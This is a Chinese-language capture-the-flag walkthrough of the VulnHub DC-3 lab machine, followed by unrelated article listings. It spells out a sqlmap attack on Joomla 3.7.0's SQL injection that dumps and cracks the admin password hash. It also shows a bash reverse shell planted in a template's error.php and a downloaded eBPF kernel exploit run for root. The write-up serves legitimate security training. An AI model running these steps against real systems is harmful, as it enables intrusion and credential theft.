DC-3

靶机部署

下载好DC-3,直接导入

可以生成一个mac地址,方便我们确认主机

信息收集

获取靶机ip(arp-scan/nmap)

arp-scan -l

nmap 192.168.190.0/24

得到靶机ip:192.168.190.139

kali ip:192.168.190.128

详细信息扫描(nmap)

nmap -sS -T5 -sC -p- --min-rate 10000 192.168.190.139

-sS:半开放扫描(SYN扫描)优点:速度快、隐蔽性强(不完成 TCP 三次握手),适合大规模扫描。

-T5:时间模板(激进模式),共有0-5级,5级最快,提高扫描速度,但可能增加误报率。

-sC:默认脚本扫描,检测服务漏洞、枚举用户、识别服务版本等

-p:端口范围

--min-rate 10000:最小发包速率:强制 Nmap 每秒至少发送 10000 个数据包

nmap -sS -p- --min-rate 10000 $ip

发现开放了80端口,存在web服务



This time, there is only one flag, one entry point and no clues.

To get the flag, you'll obviously have to gain root privileges.

How you get to be root is up to you - and, obviously, the system.

Good luck - and I hope you enjoy this little challenge. :-)

这一次,只有一个标志,一个入口点,没有线索。

要获得标志,您显然必须获得 root 权限。

如何成为 root 取决于你自己 - 显然,还有系统。

祝你好运 - 我希望你喜欢这个小挑战。:-)

敏感目录扫描(dirsearch/dirb/gobuster/御剑/7bscan)

dirsearch -u http://192.168.190.139 -e *

dirb http://192.168.190.139

发现有一个http://192.168.190.139:80/administrator/

指纹收集(whatweb)

whatweb -v 192.168.190.139

Apache/2.4.18

渗透过程

前面信息收集发现CMS为Joomla,kali上存在一个专门针对它的漏洞扫描工具Joomscan,我们尝试试试。

joomscan --url http://192.168.190.139/

http://192.168.190.139/administrator/

在msf中查找一下joomla 3.7.0有没有可以利用的脚本

searchsploit joomla 3.7.0

发现了存在sql注入

Kali的exploits路径为/usr/share/exploitdb/exploits下

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

查看一下脚本文件信息

这边我们看到了POC,可以直接利用,把localhost修改为我们的靶机ip

http://192.168.190.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

我们可以尝试去访问一下,直接提示报错,存在sql注入

我们再用提示的sqlmap语句跑一下

sqlmap -u "http://192.168.190.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]



跑出当前数据库的名字为joomladb

sqlmap -u "http://192.168.190.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --current-db



#爆破表名

sqlmap -u "http://192.168.190.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" --tables



#爆列名

sqlmap -u "http://192.168.190.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" --columns



#爆username和password值

sqlmap -u "http://192.168.190.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" -C "username,password" --dump



admin/$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

到这里我们发现password是加密的,我们直接使用kali自带的john或者hashcat的都可以

admin/snoopy

然后在http://192.168.190.139/administrator/进行登录

进来发现有很多功能点

一顿点击后 发现在extensions>templates>templates中有上传点

点击Beez3 Details and Files 进入发现了newfiles可以上传文件

但另一种方法是在PHP文件中插入反弹shell访问

当然我们要知道文件的路径

http://192.168.190.139/templates/beez3/html



我们直接在error.php中写入反弹shell

system("bash -c 'bash -i >& /dev/tcp/192.168.190.128/5555 0>&1'");



然后kali开启监听

nc -lvvp 5555

http://192.168.190.139/templates/beez3/error.php

成功反弹shell

但是获取的用户权限低,我们尝试提权。

查看suid的文件,并没有可以提权的命令。

find / -perm -u=s -type f 2>/dev/null

发现没有可以提权的命令

我们换一种思路,查看系统信息

uname -a

cat /etc/issue

cat /proc/version

使用msf 查看一下Ubuntu 16.04是否有漏洞

searchsploit ubuntu 16.04



发现存在漏洞,这里我们利用4.4.x通用提权方式

路径/usr/share/exploitdb/exploits/linux/local/39772.txt

我们查看一下

cat /usr/share/exploitdb/exploits/linux/local/39772.txt



给出了两个地址:

Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552

Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

根据前面/usr/share/exploitdb/exploits/linux/local/39772.txt文件中的使用方式进行操作。

需要将exploit.tar这个文件上传的目标主机并且运行

这里尝试用python打开http服务使靶机下载发现失败

python3 -m http.server 80

靶机: wget http://192.168.190.128/exploit.tar

这表明能访问到

我们只需要将exploit.tar文件复制到网站根目录即可。

使靶机下载

systemctl restart apache2    

cp 39772/exploit.tar /var/www/html

靶机:wget http://192.168.190.128/exploit.tar

靶机解压文件

tar -xvf exploit.tar

进入解压出来的目录,按照39772.txt文件中的提示方式进行操作

cd ebpf_mapfd_doubleput_exploit

</templates/protostar/ebpf_mapfd_doubleput_exploit$ ./compile.sh

</templates/protostar/ebpf_mapfd_doubleput_exploit$ ./doubleput

whoami

提权成功但是没有交互,我们使用交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

cd /root

cat the-flag.txt

得到flag

[VulnHub]DC-3靶场全过程的更多相关文章

  1. vulnhub DC:1渗透笔记

    DC:1渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ kali ip地址 信息收集 首先扫描一下靶机ip地址 nmap -sP 192.168 ...

  2. Vulnhub之Credit_Card_Scammers靶场渗透

    前言 一次"夺旗"练习,涵盖了许多不同的技巧. 背后的故事:骗子正在利用人们,各种假冒购物网站已经建立起来,但人们发现他们的订单从未到达.我们发现了一个诈骗网站,我们认为该网站正在 ...

  3. vulnhub: DC 2

    首先地址探测找到主机IP: root@kali:~# nmap -sn 192.168.74.139/24 Starting Nmap 7.80 ( https://nmap.org ) at 202 ...

  4. DC靶机1-9合集

    DC1 文章前提概述 本文介绍DC-1靶机的渗透测试流程 涉及知识点(比较基础): nmap扫描网段端口服务 msf的漏洞搜索 drupal7的命令执行利用 netcat反向shell mysql的基 ...

  5. Vulhub-DC-2靶场

    Vulhub-DC-2靶场 前言 最近一直忙于学习代码审计和内网渗透,所以靶场这方面的文章一直未更新,但是计划是更新完DC系列靶场的,这个不会鸽. DC-2的靶场是很简单的一共5个flag. 正文 f ...

  6. [红日安全]Web安全Day8 - XXE实战攻防

    本文由红日安全成员: ruanruan 编写,如有不当,还望斧正. 大家好,我们是红日安全-Web安全攻防小组.此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了 ...

  7. Vulnhub靶场DC-1 WP

    前言 之前提到过最近在做vlunhub的靶场复现工作,今天开始更新writeup吧.(对着walkthrough一顿乱抄嘻嘻嘻) 关于DC-1(官网翻译来的) 描述 DC-1是一个专门构建的易受攻击的 ...

  8. Vulnhub靶场——DC-1

    记一次Vulnhub靶场练习记录 靶机DC-1下载地址: 官方地址 https://download.vulnhub.com/dc/DC-1.zip 该靶场共有5个flag,下面我们一个一个寻找 打开 ...

  9. Vulnhub靶场渗透练习(一) Breach1.0

    打开靶场 固定ip需要更改虚拟机为仅主机模式 192.168.110.140 打开网页http://192.168.110.140/index.html 查看源代码发现可以加密字符串 猜测base64 ...

  10. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

随机推荐

  1. C# 中的“相等判断”

    C# 中的"相等判断" C# 中判断相等的方式很多,例如: 双等号 ==​ 实例的 Equals()​ 方法 ​Object.Equals()​ 静态方法 ​Object.Refe ...

  2. 基于近红外与可见光双目摄像头的活体人脸检测,文末附Demo

    基于近红外与可见光双目摄像头的活体人脸检测原理 人脸活体检测(Face Anti-Spoofing)是人脸识别系统中的重要一环,它负责验证捕捉到的人脸是否为真实活体,以抵御各种伪造攻击,如彩色纸张打印 ...

  3. 【Logisim】带有初始化功能的寄存器

    属于是拾人牙慧 子电路外观 子电路逻辑 描述: Q端 Counter + MUX : 实现初始化.初始时MUX选择init,待时钟第一个上升沿后,Counter([Data Bit]:1bit,[Ac ...

  4. CORS 跨域请求一种解决方案

    平常工作难遇到这类问题, 一般搭建新系统或搭建系统二时需要复用系统一一些前后端能力, 可能会遇到跨域拦截问题. 这里提供一种基于服务器解决方案. 更多其他方案, 详细细节可自行查阅更多资料, 写一些前 ...

  5. python 更新pip镜像源

    前言 默认情况下 pip 使用的是国外的镜像,在下载的时候速度非常慢,下载速度是几kb或者几十kb,花费的时间比较长. 解决办法 国内目前有些机构或者公司整理了对应的镜像源,使得通过内网就能访问即可, ...

  6. 【消息利器RabbitMQ】RabbitMQ常用内容浅析

    以下是一篇关于 RabbitMQ 的博客内容,涵盖了从基础到死信队列的实现,以及 RabbitMQ 其他常用知识点的补充.内容逻辑清晰,代码完整,适合直接发布. 使用 RabbitMQ 实现消息队列与 ...

  7. 【C语言】Linux 飞翔的小鸟

    [C语言]Linux 飞翔的小鸟 零.环境部署 安装Ncurses库 sudo apt-get install libncurses5-dev 壹.编写代码 代码如下: bird.c #include ...

  8. nodejs调用shell

    shelljs https://github.com/shelljs/shelljs 实例 var shell = require('shelljs'); if (!shell.which('git' ...

  9. vue路由params传参时出现undefined

    1.问题: 使用params方式传参时(参数不显示的方式) 获取参数时,参数undefined 2.解决: push时请使用name,不要使用path(路由的params对象使用,必须通过路由名nam ...

  10. Launchpool名词解释

    # 一.什么是Launchpool Launchpool是一种加密货币领域的创新机制,通常由交易所或DeFi平台提供,允许用户通过质押(staking)或锁定特定代币来获得新项目的代币奖励. ## L ...